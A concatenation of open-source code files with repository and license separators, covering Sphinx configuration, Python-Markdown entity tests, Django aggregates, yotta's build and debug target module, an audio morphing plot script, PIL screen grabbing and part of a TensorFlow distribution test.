# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
# Latex figure (float) alignment
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'rtcclient.tex', u'rtcclient Documentation',
u'Di Xu', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'rtcclient', u'rtcclient Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'rtcclient', u'rtcclient Documentation',
author, 'rtcclient', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
| apache-2.0 |
waylan/Python-Markdown | tests/test_syntax/inline/test_entities.py | 2 | 1625 | """
Python Markdown
A Python implementation of John Gruber's Markdown.
Documentation: https://python-markdown.github.io/
GitHub: https://github.com/Python-Markdown/markdown/
PyPI: https://pypi.org/project/Markdown/
Started by Manfred Stienstra (http://www.dwerg.net/).
Maintained for a few years by Yuri Takhteyev (http://www.freewisdom.org).
Currently maintained by Waylan Limberg (https://github.com/waylan),
Dmitry Shachnev (https://github.com/mitya57) and Isaac Muse (https://github.com/facelessuser).
Copyright 2007-2018 The Python Markdown Project (v. 1.7 and later)
Copyright 2004, 2005, 2006 Yuri Takhteyev (v. 0.2-1.6b)
Copyright 2004 Manfred Stienstra (the original version)
License: BSD (see LICENSE.md for details).
"""
from markdown.test_tools import TestCase
class TestEntities(TestCase):
def test_named_entities(self):
self.assertMarkdownRenders("&", "<p>&</p>")
self.assertMarkdownRenders("²", "<p>²</p>")
self.assertMarkdownRenders("Á", "<p>Á</p>")
def test_decimal_entities(self):
self.assertMarkdownRenders("&", "<p>&</p>")
self.assertMarkdownRenders("²", "<p>²</p>")
def test_hexadecimal_entities(self):
self.assertMarkdownRenders("&", "<p>&</p>")
self.assertMarkdownRenders("²", "<p>²</p>")
def test_false_entities(self):
self.assertMarkdownRenders("¬ an entity;", "<p>&not an entity;</p>")
self.assertMarkdownRenders("&#B2;", "<p>&#B2;</p>")
self.assertMarkdownRenders("&#xnothex;", "<p>&#xnothex;</p>")
| bsd-3-clause |
megaumi/django | django/db/models/sql/aggregates.py | 174 | 4843 | """
Classes to represent the default SQL aggregate functions
"""
import copy
import warnings
from django.db.models.fields import FloatField, IntegerField
from django.db.models.lookups import RegisterLookupMixin
from django.utils.deprecation import RemovedInDjango110Warning
from django.utils.functional import cached_property
__all__ = ['Aggregate', 'Avg', 'Count', 'Max', 'Min', 'StdDev', 'Sum', 'Variance']
warnings.warn(
"django.db.models.sql.aggregates is deprecated. Use "
"django.db.models.aggregates instead.",
RemovedInDjango110Warning, stacklevel=2)
class Aggregate(RegisterLookupMixin):
"""
Default SQL Aggregate.
"""
is_ordinal = False
is_computed = False
sql_template = '%(function)s(%(field)s)'
def __init__(self, col, source=None, is_summary=False, **extra):
"""Instantiate an SQL aggregate
* col is a column reference describing the subject field
of the aggregate. It can be an alias, or a tuple describing
a table and column name.
* source is the underlying field or aggregate definition for
the column reference. If the aggregate is not an ordinal or
computed type, this reference is used to determine the coerced
output type of the aggregate.
* extra is a dictionary of additional data to provide for the
aggregate definition
Also utilizes the class variables:
* sql_function, the name of the SQL function that implements the
aggregate.
* sql_template, a template string that is used to render the
aggregate into SQL.
* is_ordinal, a boolean indicating if the output of this aggregate
is an integer (e.g., a count)
* is_computed, a boolean indicating if this output of this aggregate
is a computed float (e.g., an average), regardless of the input
type.
"""
self.col = col
self.source = source
self.is_summary = is_summary
self.extra = extra
# Follow the chain of aggregate sources back until you find an
# actual field, or an aggregate that forces a particular output
# type. This type of this field will be used to coerce values
# retrieved from the database.
tmp = self
while tmp and isinstance(tmp, Aggregate):
if getattr(tmp, 'is_ordinal', False):
tmp = self._ordinal_aggregate_field
elif getattr(tmp, 'is_computed', False):
tmp = self._computed_aggregate_field
else:
tmp = tmp.source
self.field = tmp
# Two fake fields used to identify aggregate types in data-conversion operations.
@cached_property
def _ordinal_aggregate_field(self):
return IntegerField()
@cached_property
def _computed_aggregate_field(self):
return FloatField()
def relabeled_clone(self, change_map):
clone = copy.copy(self)
if isinstance(self.col, (list, tuple)):
clone.col = (change_map.get(self.col[0], self.col[0]), self.col[1])
return clone
def as_sql(self, compiler, connection):
"Return the aggregate, rendered as SQL with parameters."
params = []
if hasattr(self.col, 'as_sql'):
field_name, params = self.col.as_sql(compiler, connection)
elif isinstance(self.col, (list, tuple)):
field_name = '.'.join(compiler(c) for c in self.col)
else:
field_name = compiler(self.col)
substitutions = {
'function': self.sql_function,
'field': field_name
}
substitutions.update(self.extra)
return self.sql_template % substitutions, params
def get_group_by_cols(self):
return []
@property
def output_field(self):
return self.field
class Avg(Aggregate):
is_computed = True
sql_function = 'AVG'
class Count(Aggregate):
is_ordinal = True
sql_function = 'COUNT'
sql_template = '%(function)s(%(distinct)s%(field)s)'
def __init__(self, col, distinct=False, **extra):
super(Count, self).__init__(col, distinct='DISTINCT ' if distinct else '', **extra)
class Max(Aggregate):
sql_function = 'MAX'
class Min(Aggregate):
sql_function = 'MIN'
class StdDev(Aggregate):
is_computed = True
def __init__(self, col, sample=False, **extra):
super(StdDev, self).__init__(col, **extra)
self.sql_function = 'STDDEV_SAMP' if sample else 'STDDEV_POP'
class Sum(Aggregate):
sql_function = 'SUM'
class Variance(Aggregate):
is_computed = True
def __init__(self, col, sample=False, **extra):
super(Variance, self).__init__(col, **extra)
self.sql_function = 'VAR_SAMP' if sample else 'VAR_POP'
| bsd-3-clause |
eyeye/yotta | yotta/lib/target.py | 1 | 24641 | # Copyright 2014-2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0
# See LICENSE file for details.
# standard library modules, , ,
import os
import signal
import subprocess
import logging
import string
import traceback
import errno
import itertools
import shlex
from collections import OrderedDict
# Ordered JSON, , read & write json, internal
import ordered_json
# access, , get components, internal
import access
import access_common
# Pack, , common parts of Components/Targets, internal
import pack
# fsutils, , misc filesystem utils, internal
import fsutils
Target_Description_File = 'target.json'
App_Config_File = 'config.json'
Registry_Namespace = 'targets'
Schema_File = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'schema', 'target.json')
logger = logging.getLogger('target')
def _ignoreSignal(signum, frame):
logger.debug('ignoring signal %s, traceback:\n%s' % (
signum, ''.join(traceback.format_list(traceback.extract_stack(frame)))
))
def _newPGroup():
os.setpgrp()
def _mergeDictionaries(*args):
''' merge dictionaries of dictionaries recursively, with elements from
dictionaries earlier in the argument sequence taking precedence
'''
# to support merging of OrderedDicts, copy the result type from the first
# argument:
result = type(args[0])()
for k, v in itertools.chain(*[x.items() for x in args]):
if not k in result:
result[k] = v
elif isinstance(result[k], dict) and isinstance(v, dict):
result[k] = _mergeDictionaries(result[k], v)
return result
# API
def getDerivedTarget(
target_name_and_version,
targets_path,
application_dir = None,
install_missing = True,
update_installed = False
):
''' Get the specified target description, optionally ensuring that it (and
all dependencies) are installed in targets_path.
Returns (DerivedTarget, errors), or (None, errors) if the leaf target
could not be found/installed.
'''
logger.debug('satisfy target: %s' % target_name_and_version);
if ',' in target_name_and_version:
name, ver = target_name_and_version.split(',')
dspec = pack.DependencySpec(name, ver)
else:
dspec = pack.DependencySpec(target_name_and_version, "*")
leaf_target = None
previous_name = dspec.name
search_dirs = [targets_path]
target_hierarchy = []
errors = []
while True:
t = None
try:
if install_missing:
t = access.satisfyVersion(
name = dspec.name,
version_required = dspec.version_req,
available = target_hierarchy,
search_paths = search_dirs,
working_directory = targets_path,
update_installed = ('Update' if update_installed else None),
type = 'target'
)
else:
t = access.satisfyVersionFromSearchPaths(
name = dspec.name,
version_required = dspec.version_req,
search_paths = search_dirs,
type = 'target'
)
except access_common.Unavailable as e:
errors.append(e)
if not t:
if install_missing:
logger.error(
'could not install target %s for %s' %
(dspec, previous_name)
)
break
else:
target_hierarchy.append(t)
previous_name = dspec.name
assert(isinstance(t, Target))
dspec = t.baseTargetSpec() #pylint: disable=no-member
if not leaf_target:
leaf_target = t
if dspec is None:
break
if leaf_target is None:
return (None, errors)
# if we have a valid target, try to load the app-specific config data (if
# any):
app_config = {}
if application_dir is not None:
app_config_fname = os.path.join(application_dir, App_Config_File)
if os.path.exists(app_config_fname):
try:
app_config = ordered_json.load(app_config_fname)
except Exception as e:
errors.append(Exception("Invalid application config.json: %s" % (e)))
return (DerivedTarget(leaf_target, target_hierarchy[1:], app_config), errors)
class Target(pack.Pack):
def __init__(self, path, installed_linked=False, latest_suitable_version=None):
''' Initialise a Target based on a directory. If the directory does not
contain a valid target.json file the initialised object will test
false, and will contain an error property containing the failure.
'''
# re-initialise with the information from the most-derived target
super(Target, self).__init__(
path,
description_filename = Target_Description_File,
installed_linked = installed_linked,
schema_filename = Schema_File,
latest_suitable_version = latest_suitable_version
)
def baseTargetSpec(self):
''' returns pack.DependencySpec for the base target of this target (or
None if this target does not inherit from another target.
'''
inherits = self.description.get('inherits', {})
if len(inherits) == 1:
return pack.DependencySpec(list(inherits.items())[0][0], list(inherits.items())[0][1])
elif len(inherits) > 1:
logger.error('target %s specifies multiple base targets, but only one is allowed', self.getName())
return None
def getRegistryNamespace(self):
return Registry_Namespace
def getConfig(self):
return self.description.get('config', OrderedDict())
class DerivedTarget(Target):
def __init__(self, leaf_target, base_targets, app_config):
''' Initialise a DerivedTarget (representing an inheritance hierarchy of
Targets.), given the most-derived Target description, and a set of
available Targets to compose the rest of the lineage from.
DerivedTarget provides build & debug commands, and access to the
derived target config info (merged with the application config
info from config.json, if any).
It's possible to update the application config for an existing
DerivedTarget instance.
DerivedTarget can also be used as a stand-in for the most-derived
(leaf) target in the inheritance hierarchy.
'''
# initialise the base class as a copy of leaf_target
super(DerivedTarget, self).__init__(
path = leaf_target.path,
installed_linked = leaf_target.installed_linked,
latest_suitable_version = leaf_target.latest_suitable_version
)
self.hierarchy = [leaf_target] + base_targets[:]
self.config = None
self.app_config = app_config
# override truthiness to test validity of the entire hierarchy:
def __nonzero__(self):
for t in self.hierarchy:
if not t: return False
return bool(len(self.hierarchy))
def __bool__(self):
return self.__nonzero__()
def _loadConfig(self):
''' load the configuration information from the target hierarchy '''
config_dicts = [self.app_config] + [t.getConfig() for t in self.hierarchy]
self.config = _mergeDictionaries(*config_dicts)
# note that backwards compatibility with the "similarTo" data that used
# to be used for target-dependencies is ensured at the point of use. We
# don't merge similarTo into the config because it might break things.
def _ensureConfig(self):
if self.config is None:
self._loadConfig()
def setApplicationConfig(self, config):
''' set the application-config data to the contents of the
dictionary-like object `config`
'''
self.app_config = config
self._loadConfig()
def getConfigValue(self, conf_key):
self._ensureConfig()
key_path = conf_key.split('.');
c = self.config
for part in key_path:
if part in c:
c = c[part]
else:
return None
return c
def getSimilarTo_Deprecated(self):
r = []
for t in self.hierarchy:
r.append(t.getName())
r += t.description.get('similarTo', [])
return r
def getMergedConfig(self):
self._ensureConfig()
return self.config
def getToolchainFiles(self):
return [
os.path.join(x.path, x.description['toolchain']) for x in self.hierarchy if 'toolchain' in x.description
]
@classmethod
def addBuildOptions(cls, parser):
parser.add_argument('-G', '--cmake-generator', dest='cmake_generator',
default='Ninja',
choices=(
'Unix Makefiles',
'Ninja',
'Xcode',
'Sublime Text 2 - Ninja',
'Sublime Text 2 - Unix Makefiles'
)
)
@classmethod
def overrideBuildCommand(cls, generator_name, targets=None):
if targets is None:
targets = []
# when we build using cmake --build, the nice colourised output is lost
# - so override with the actual build command for command-line
# generators where people will care:
try:
r = {
'Unix Makefiles': ['make'],
'Ninja': ['ninja']
}[generator_name]
# all of the above build programs take the build targets (e.g.
# "all") as the last arguments
if targets is not None:
r += targets
return r
except KeyError:
return None
def hintForCMakeGenerator(self, generator_name, component):
try:
name = self.getName()
component_name = component.getName()
return {
'Xcode':
'to open the built project, run:\nopen ./build/%s/%s.xcodeproj' % (name, component_name),
'Sublime Text 2 - Ninja':
'to open the built project, run:\nopen ./build/%s/%s.??' % (name, component_name),
'Sublime Text 2 - Unix Makefiles':
'to open the built project, run:\nopen ./build/%s/%s.??' % (name, component_name)
}[generator_name]
except KeyError:
return None
def exec_helper(self, cmd, builddir):
''' Execute the given command, returning an error message if an error occured
or None if the command was succesful.'''
try:
child = subprocess.Popen(cmd, cwd=builddir)
child.wait()
except OSError as e:
if e.errno == errno.ENOENT:
if cmd[0] == 'cmake':
return 'CMake is not installed, please follow the installation instructions at http://docs.yottabuild.org/#installing'
else:
return '%s is not installed' % (cmd[0])
else:
return 'command %s failed' % (cmd)
if child.returncode:
return 'command %s failed' % (cmd)
@fsutils.dropRootPrivs
def build(self, builddir, component, args, release_build=False, build_args=None, targets=None):
''' Execute the commands necessary to build this component, and all of
its dependencies. '''
if build_args is None:
build_args = []
if targets is None:
targets = []
# in the future this may be specified in the target description, but
# for now we only support cmake, so everything is simple:
build_type = ('Debug', 'RelWithDebInfo')[release_build]
if build_type:
cmd = ['cmake', '-D', 'CMAKE_BUILD_TYPE=%s' % build_type, '-G', args.cmake_generator, '.']
else:
cmd = ['cmake', '-G', args.cmake_generator, '.']
res = self.exec_helper(cmd, builddir)
if res is not None:
return res
# cmake error: the generated Ninja build file will not work on windows when arguments are read from
# a file (@file) instead of the command line, since '\' in @file is interpreted as an escape sequence.
# !!! FIXME: remove this once http://www.cmake.org/Bug/view.php?id=15278 is fixed!
if args.cmake_generator == "Ninja" and os.name == 'nt':
logger.debug("Converting back-slashes in build.ninja to forward-slashes")
build_file = os.path.join(builddir, "build.ninja")
# We want to convert back-slashes to forward-slashes, except in macro definitions, such as
# -DYOTTA_COMPONENT_VERSION = \"0.0.1\". So we use a little trick: first we change all \"
# strings to an unprintable ASCII char that can't appear in build.ninja (in this case \1),
# then we convert all the back-slashed to forward-slashes, then we convert '\1' back to \".
try:
f = open(build_file, "r+t")
data = f.read()
data = data.replace('\\"', '\1')
data = data.replace('\\', '/')
data = data.replace('\1', '\\"')
f.seek(0)
f.write(data)
f.close()
except:
return 'Unable to update "%s", aborting' % build_file
build_command = self.overrideBuildCommand(args.cmake_generator, targets=targets)
if build_command:
cmd = build_command + build_args
else:
cmd = ['cmake', '--build', builddir]
if len(targets):
# !!! FIXME: support multiple targets with the default CMake
# build command
cmd += ['--target', targets[0]]
cmd += build_args
res = self.exec_helper(cmd, builddir)
if res is not None:
return res
hint = self.hintForCMakeGenerator(args.cmake_generator, component)
if hint:
logger.info(hint)
def findProgram(self, builddir, program):
''' Return the builddir-relative path of program, if only a partial
path is specified. Returns None and logs an error message if the
program is ambiguous or not found
'''
# if this is an exact match, do no further checking:
if os.path.isfile(os.path.join(builddir, program)):
logging.info('found %s' % program)
return program
exact_matches = []
insensitive_matches = []
approx_matches = []
for path, dirs, files in os.walk(builddir):
if program in files:
exact_matches.append(os.path.relpath(os.path.join(path, program), builddir))
continue
files_lower = [f.lower() for f in files]
if program.lower() in files_lower:
insensitive_matches.append(
os.path.relpath(
os.path.join(path, files[files_lower.index(program.lower())]),
builddir
)
)
continue
# !!! TODO: in the future add approximate string matching (typos,
# etc.), for now we just test stripping any paths off program, and
# looking for substring matches:
pg_basen_lower_noext = os.path.splitext(os.path.basename(program).lower())[0]
for f in files_lower:
if pg_basen_lower_noext in f:
approx_matches.append(
os.path.relpath(
os.path.join(path, files[files_lower.index(f)]),
builddir
)
)
if len(exact_matches) == 1:
logging.info('found %s at %s', program, exact_matches[0])
return exact_matches[0]
elif len(exact_matches) > 1:
logging.error(
'%s matches multiple executables, please use a full path (one of %s)' % (
program,
', or '.join(['"'+os.path.join(m, program)+'"' for m in exact_matches])
)
)
return None
# if we have matches with and without a file extension, prefer the
# no-file extension version, and discard the others (so we avoid
# picking up post-processed files):
reduced_approx_matches = []
for m in approx_matches:
root = os.path.splitext(m)[0]
if (m == root) or (root not in approx_matches):
reduced_approx_matches.append(m)
approx_matches = reduced_approx_matches
for matches in (insensitive_matches, approx_matches):
if len(matches) == 1:
logging.info('found %s at %s' % (
program, matches[0]
))
return matches[0]
elif len(matches) > 1:
logging.error(
'%s is similar to several executables found. Please use an exact name:\n%s' % (
program,
'\n'.join(matches)
)
)
return None
logging.error('could not find program "%s" to debug' % program)
return None
def debug(self, builddir, program):
''' Launch a debugger for the specified program. Uses the `debug`
script if specified by the target, falls back to the `debug` and
`debugServer` commands if not. `program` is inserted into the
$program variable in commands.
'''
try:
signal.signal(signal.SIGINT, _ignoreSignal);
if 'scripts' in self.description and 'debug' in self.description['scripts']:
return self._debugWithScript(builddir, program)
elif 'debug' in self.description:
logger.warning(
'target %s provides deprecated debug property. It should '+
'provide script.debug instead.', self.getName()
)
return self._debugDeprecated(builddir, program)
else:
return "Target %s does not specify debug commands" % self
finally:
# clear the sigint handler
signal.signal(signal.SIGINT, signal.SIG_DFL);
@fsutils.dropRootPrivs
def _debugWithScript(self, builddir, program):
child = None
try:
prog_path = prog_path = self.findProgram(builddir, program)
if prog_path is None:
return
cmd = [
os.path.expandvars(string.Template(x).safe_substitute(program=prog_path))
for x in self.description['scripts']['debug']
]
logger.debug('starting debugger: %s', cmd)
child = subprocess.Popen(
cmd, cwd = builddir
)
child.wait()
if child.returncode:
return "debug process exited with status %s" % child.returncode
child = None
except:
# reset the terminal, in case the debugger has screwed it up
os.system('reset')
raise
finally:
if child is not None:
try:
child.terminate()
except OSError as e:
pass
@fsutils.dropRootPrivs
def _debugDeprecated(self, builddir, program):
prog_path = self.findProgram(builddir, program)
if prog_path is None:
return
with open(os.devnull, "w") as dev_null:
daemon = None
child = None
try:
# debug-server is the old name, debugServer is the new name
debug_server_prop = 'debugServer'
if not debug_server_prop in self.description:
debug_server_prop = 'debug-server'
if debug_server_prop in self.description:
logger.debug('starting debug server...')
daemon = subprocess.Popen(
self.description[debug_server_prop],
cwd = builddir,
stdout = dev_null,
stderr = dev_null,
preexec_fn = _newPGroup
)
else:
daemon = None
cmd = [
os.path.expandvars(string.Template(x).safe_substitute(program=prog_path))
for x in self.description['debug']
]
logger.debug('starting debugger: %s', cmd)
child = subprocess.Popen(
cmd, cwd = builddir
)
child.wait()
if child.returncode:
return "debug process executed with status %s" % child.returncode
child = None
except:
# reset the terminal, in case the debugger has screwed it up
os.system('reset')
raise
finally:
if child is not None:
try:
child.terminate()
except OSError as e:
pass
if daemon is not None:
logger.debug('shutting down debug server...')
try:
daemon.terminate()
except OSError as e:
pass
@fsutils.dropRootPrivs
def test(self, cwd, test_command, filter_command, forward_args):
# we assume that test commands are relative to the current directory.
test_command = './' + test_command
if not ('scripts' in self.description and 'test' in self.description['scripts']):
cmd = shlex.split(test_command)
else:
cmd = [
os.path.expandvars(string.Template(x).safe_substitute(program=test_command))
for x in self.description['scripts']['test']
] + forward_args
test_child = None
test_filter = None
try:
logger.debug('running test: %s', cmd)
if filter_command:
logger.debug('using output filter command: %s', filter_command)
test_child = subprocess.Popen(
cmd, cwd = cwd, stdout = subprocess.PIPE
)
try:
test_filter = subprocess.Popen(
filter_command, cwd = cwd, stdin = test_child.stdout
)
except OSError as e:
logger.error('error starting test output filter "%s": %s', filter_command, e)
test_child.terminate()
return 1
test_filter.communicate()
test_child.terminate()
test_child.stdout.close()
returncode = test_filter.returncode
test_child = None
test_filter = None
if returncode:
logger.debug("test filter exited with status %s (=fail)", returncode)
return 1
else:
try:
test_child = subprocess.Popen(
cmd, cwd = cwd
)
except OSError as e:
if e.errno == errno.ENOENT:
logger.error('Error: no such file or directory: "%s"', cmd[0])
return 1
raise
test_child.wait()
returncode = test_child.returncode
test_child = None
if returncode:
logger.debug("test process exited with status %s (=fail)", returncode)
return 1
finally:
if test_child is not None:
test_child.terminate()
if test_filter is not None:
test_filter.terminate()
logger.debug("test %s passed", test_command)
return 0
| apache-2.0 |
zymsys/sms-tools | lectures/08-Sound-transformations/plots-code/stftMorph-frame.py | 21 | 2700 | import numpy as np
import time, os, sys
import matplotlib.pyplot as plt
from scipy.signal import hamming, resample
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), '../../../software/models/'))
import dftModel as DFT
import utilFunctions as UF
import math
(fs, x1) = UF.wavread('../../../sounds/orchestra.wav')
(fs, x2) = UF.wavread('../../../sounds/speech-male.wav')
w1 = np.hamming(1024)
N1 = 1024
H1 = 256
w2 = np.hamming(1024)
N2 = 1024
smoothf = .1
balancef = .7
M1 = w1.size # size of analysis window
hM1_1 = int(math.floor((M1+1)/2)) # half analysis window size by rounding
hM1_2 = int(math.floor(M1/2)) # half analysis window size by floor
M2 = w2.size # size of analysis window
hM2_1 = int(math.floor((M2+1)/2)) # half analysis window size by rounding
hM2_2 = int(math.floor(M2/2)) # half analysis window size by floor2
loc1 = 14843
loc2 = 9294
x1 = x1[loc1-hM1_1:loc1+hM1_2]
x2 = x2[loc2-hM2_1:loc2+hM2_2]
mX1, pX1 = DFT.dftAnal(x1, w1, N1) # compute dft
mX2, pX2 = DFT.dftAnal(x2, w2, N2) # compute dft
# morph
mX2smooth = resample(np.maximum(-200, mX2), mX2.size*smoothf) # smooth spectrum of second sound
mX2 = resample(mX2smooth, mX2.size)
mY = balancef * mX2 + (1-balancef) * mX1 # generate output spectrum
#-----synthesis-----
y = DFT.dftSynth(mY, pX1, M1) * sum(w1) # overlap-add to generate output sound
mY1, pY1 = DFT.dftAnal(y, w1, M1) # overlap-add to generate output sound
plt.figure(1, figsize=(12, 9))
plt.subplot(321)
plt.plot(np.arange(N1)/float(fs), x1*w1, 'b', lw=1.5)
plt.axis([0, N1/float(fs), min(x1*w1), max(x1*w1)])
plt.title('x1 (orchestra.wav)')
plt.subplot(323)
plt.plot(fs*np.arange(mX1.size)/float(mX1.size), mX1-max(mX1), 'r', lw=1.5, label = 'mX1')
plt.plot(fs*np.arange(mX2.size)/float(mX2.size), mX2-max(mX2), 'k', lw=1.5, label='mX2')
plt.legend(prop={'size':10})
plt.axis([0,fs/4.0,-70,2])
plt.title('mX1 + mX2 (speech-male.wav)')
plt.subplot(325)
plt.plot(fs*np.arange(pX1.size)/float(pX1.size), pX1, 'c', lw=1.5)
plt.axis([0,fs/4.0,min(pX1),20])
plt.title('pX1')
plt.subplot(322)
plt.plot(np.arange(N1)/float(fs), y, 'b', lw=1.5)
plt.axis([0, float(N1)/fs, min(y), max(y)])
plt.title('y')
plt.subplot(324)
plt.plot(fs*np.arange(mY1.size)/float(mY1.size), mY1-max(mY1), 'r', lw=1.5)
plt.axis([0,fs/4.0,-70,2])
plt.title('mY')
plt.subplot(326)
plt.plot(fs*np.arange(pY1.size)/float(pY1.size), pY1, 'c', lw=1.5)
plt.axis([0,fs/4.0,min(pY1),6])
plt.title('pY')
plt.tight_layout()
plt.savefig('stftMorph-frame.png')
plt.show()
| agpl-3.0 |
rizumu/django | django/contrib/gis/geos/prototypes/prepared.py | 288 | 1214 | from ctypes import c_char
from django.contrib.gis.geos.libgeos import (
GEOM_PTR, PREPGEOM_PTR, GEOSFuncFactory,
)
from django.contrib.gis.geos.prototypes.errcheck import check_predicate
# Prepared geometry constructor and destructors.
geos_prepare = GEOSFuncFactory('GEOSPrepare', argtypes=[GEOM_PTR], restype=PREPGEOM_PTR)
prepared_destroy = GEOSFuncFactory('GEOSPreparedGeom_destroy', argtpes=[PREPGEOM_PTR])
# Prepared geometry binary predicate support.
class PreparedPredicate(GEOSFuncFactory):
argtypes = [PREPGEOM_PTR, GEOM_PTR]
restype = c_char
errcheck = staticmethod(check_predicate)
prepared_contains = PreparedPredicate('GEOSPreparedContains')
prepared_contains_properly = PreparedPredicate('GEOSPreparedContainsProperly')
prepared_covers = PreparedPredicate('GEOSPreparedCovers')
prepared_intersects = PreparedPredicate('GEOSPreparedIntersects')
# Functions added in GEOS 3.3
prepared_crosses = PreparedPredicate('GEOSPreparedCrosses')
prepared_disjoint = PreparedPredicate('GEOSPreparedDisjoint')
prepared_overlaps = PreparedPredicate('GEOSPreparedOverlaps')
prepared_touches = PreparedPredicate('GEOSPreparedTouches')
prepared_within = PreparedPredicate('GEOSPreparedWithin')
| bsd-3-clause |
mollstam/UnrealPy | UnrealPyEmbed/Development/Python/2015.08.07-Python2710-x64-Source-vs2015/Python27/Source/Pillow-2.9.0/PIL/ImageGrab.py | 52 | 1218 | #
# The Python Imaging Library
# $Id$
#
# screen grabber (windows only)
#
# History:
# 2001-04-26 fl created
# 2001-09-17 fl use builtin driver, if present
# 2002-11-19 fl added grabclipboard support
#
# Copyright (c) 2001-2002 by Secret Labs AB
# Copyright (c) 2001-2002 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
from PIL import Image
import sys
if sys.platform != "win32":
raise ImportError("ImageGrab is Windows only")
try:
# built-in driver (1.1.3 and later)
grabber = Image.core.grabscreen
except AttributeError:
# stand-alone driver (pil plus)
import _grabscreen
grabber = _grabscreen.grab
def grab(bbox=None):
size, data = grabber()
im = Image.frombytes(
"RGB", size, data,
# RGB, 32-bit line padding, origo in lower left corner
"raw", "BGR", (size[0]*3 + 3) & -4, -1
)
if bbox:
im = im.crop(bbox)
return im
def grabclipboard():
debug = 0 # temporary interface
data = Image.core.grabclipboard(debug)
if isinstance(data, bytes):
from PIL import BmpImagePlugin
import io
return BmpImagePlugin.DibImageFile(io.BytesIO(data))
return data
| mit |
vrv/tensorflow | tensorflow/contrib/distributions/python/kernel_tests/transformed_distribution_test.py | 74 | 12624 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for TransformedDistribution."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from scipy import stats
from tensorflow.contrib import distributions
from tensorflow.contrib import linalg
from tensorflow.contrib.distributions.python.ops import bijectors
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
bs = bijectors
ds = distributions
la = linalg
class TransformedDistributionTest(test.TestCase):
def _cls(self):
return ds.TransformedDistribution
def testTransformedDistribution(self):
g = ops.Graph()
with g.as_default():
mu = 3.0
sigma = 2.0
# Note: the Jacobian callable only works for this example; more generally
# you may or may not need a reduce_sum.
log_normal = self._cls()(
distribution=ds.Normal(loc=mu, scale=sigma),
bijector=bs.Exp(event_ndims=0))
sp_dist = stats.lognorm(s=sigma, scale=np.exp(mu))
# sample
sample = log_normal.sample(100000, seed=235)
self.assertAllEqual([], log_normal.event_shape)
with self.test_session(graph=g):
self.assertAllEqual([], log_normal.event_shape_tensor().eval())
self.assertAllClose(
sp_dist.mean(), np.mean(sample.eval()), atol=0.0, rtol=0.05)
# pdf, log_pdf, cdf, etc...
# The mean of the lognormal is around 148.
test_vals = np.linspace(0.1, 1000., num=20).astype(np.float32)
for func in [[log_normal.log_prob, sp_dist.logpdf],
[log_normal.prob, sp_dist.pdf],
[log_normal.log_cdf, sp_dist.logcdf],
[log_normal.cdf, sp_dist.cdf],
[log_normal.survival_function, sp_dist.sf],
[log_normal.log_survival_function, sp_dist.logsf]]:
actual = func[0](test_vals)
expected = func[1](test_vals)
with self.test_session(graph=g):
self.assertAllClose(expected, actual.eval(), atol=0, rtol=0.01)
def testCachedSamplesWithoutInverse(self):
with self.test_session() as sess:
mu = 3.0
sigma = 0.02
log_normal = self._cls()(
distribution=ds.Normal(loc=mu, scale=sigma),
bijector=bs.Exp(event_ndims=0))
sample = log_normal.sample(1)
sample_val, log_pdf_val = sess.run([sample, log_normal.log_prob(sample)])
self.assertAllClose(
stats.lognorm.logpdf(sample_val, s=sigma, scale=np.exp(mu)),
log_pdf_val,
atol=1e-2)
def testShapeChangingBijector(self):
with self.test_session():
softmax = bs.SoftmaxCentered()
standard_normal = ds.Normal(loc=0., scale=1.)
multi_logit_normal = self._cls()(
distribution=standard_normal,
bijector=softmax)
x = [[-np.log(3.), 0.],
[np.log(3), np.log(5)]]
y = softmax.forward(x).eval()
expected_log_pdf = (stats.norm(loc=0., scale=1.).logpdf(x) -
np.sum(np.log(y), axis=-1))
self.assertAllClose(expected_log_pdf,
multi_logit_normal.log_prob(y).eval())
self.assertAllClose(
[1, 2, 3, 2],
array_ops.shape(multi_logit_normal.sample([1, 2, 3])).eval())
self.assertAllEqual([2], multi_logit_normal.event_shape)
self.assertAllEqual([2], multi_logit_normal.event_shape_tensor().eval())
def testEntropy(self):
with self.test_session():
shift = np.array([[-1, 0, 1], [-1, -2, -3]], dtype=np.float32)
